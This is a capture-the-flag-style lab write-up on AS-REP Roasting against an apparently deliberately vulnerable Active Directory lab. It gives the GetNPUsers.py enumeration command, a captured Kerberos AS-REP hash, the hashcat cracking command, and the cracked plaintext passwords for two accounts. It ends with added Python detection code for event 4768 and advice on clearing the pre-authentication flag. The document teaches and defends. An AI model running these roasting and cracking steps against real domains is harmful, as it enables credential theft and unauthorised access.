⚔️4.3 - ASREP Roasting
ASREP Roasting

First we save all the usernames found for the domain north.sevenkingdoms.local into a .txt file. Then we can use GetNPUsers.py to request tickets for them:
GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile usersList.txt
###############################################
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:dccf6f02665080f8d076211bb2d59a87$e3121a6dc5426f5dc28ef312948c9242328764c33f57b3d1ffbcfa47ef3d066c2e312ec03a5d4747ee1be2135b2cda985318325489882125455c18c9ceecfc9d6efafb650cc49ff0a1e9f8ec1e1a8de943fd6786d2010d3d44e1a641b43362f72e7490d1adbede9ade9ba58287f20863f77bf934b932bc0f19333585d7ad12e93d594d35ec72cac388baf9320d4a13c2808e4562290d9ddd6804365192b499c558b50b22537899891acfe2e700124c5e28b755a98acff1dbd615f6d967082fb54f6871ed2b26e066c898b6b25324a0276b486d25b78796fbaa23889939fefa9d021ceb4963d712aef163b1556030965ae2baaaeff0ad3bc9decb997f485b8a006713edc0c308
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
Cracking Hashes

hashcat -m 18200 -a 0 brandon.stark.hash.txt /usr/share/wordlists/rockyou.txt

NICE!! We now have two credentials:
samwell.tarly:Heartsbane
brandon.stark:iseedeadpeople
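
On the domain controller, a ticket issued to an account without pre-authentication is recorded as event 4768 with pre-authentication type 0. The following is an added example, not part of the original write-up, that filters exported 4768 events for such requests; the JSON-lines export format, the function names and every sample event are assumptions constructed for illustration.

```python
import json

# Constructed sample: Security-log event 4768 (TGT requested) exported as JSON
# lines. Field names follow the 4768 schema; every value below is made up.
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "jon.snow", "IpAddress": "::ffff:192.168.56.22", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2"}
{"EventID": 4768, "TargetUserName": "brandon.stark", "IpAddress": "::ffff:192.168.56.1", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0"}
{"EventID": 4768, "TargetUserName": "DC01$", "IpAddress": "::1", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2"}
{"EventID": 4768, "TargetUserName": "not.a.user", "IpAddress": "::ffff:192.168.56.1", "Status": "0x6", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-"}
{"EventID": 4768, "TargetUserName": "svc.legacy", "IpAddress": "192.168.56.40", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "0"}
{"EventID": 4624, "TargetUserName": "robb.stark", "IpAddress": "192.168.56.11"}
"""

RC4_HMAC = 0x17  # etype 23, the same number seen in the $krb5asrep$23$ prefix


def find_preauthless_tgt_requests(jsonl):
    """Return one finding per successful TGT request made without pre-auth."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        # Only successful issuance matters: a failed request returns no AS-REP.
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        # PreAuthType 0: the KDC answered without any proof of the account key.
        if ev.get("PreAuthType") != "0":
            continue
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        findings.append({
            "user": ev["TargetUserName"],
            "source": ev.get("IpAddress", "").replace("::ffff:", ""),
            "etype": etype,
            # RC4 is treated here as an extra signal to triage first.
            "rc4": etype == RC4_HMAC,
        })
    return findings


def by_source(findings):
    """Group affected accounts per requesting host, to spot list-driven requests."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["source"], set()).add(f["user"])
    return {src: sorted(users) for src, users in grouped.items()}
```

Every account this reports has UF_DONT_REQUIRE_PREAUTH set; clearing that flag where it is not needed removes the exposure shown above.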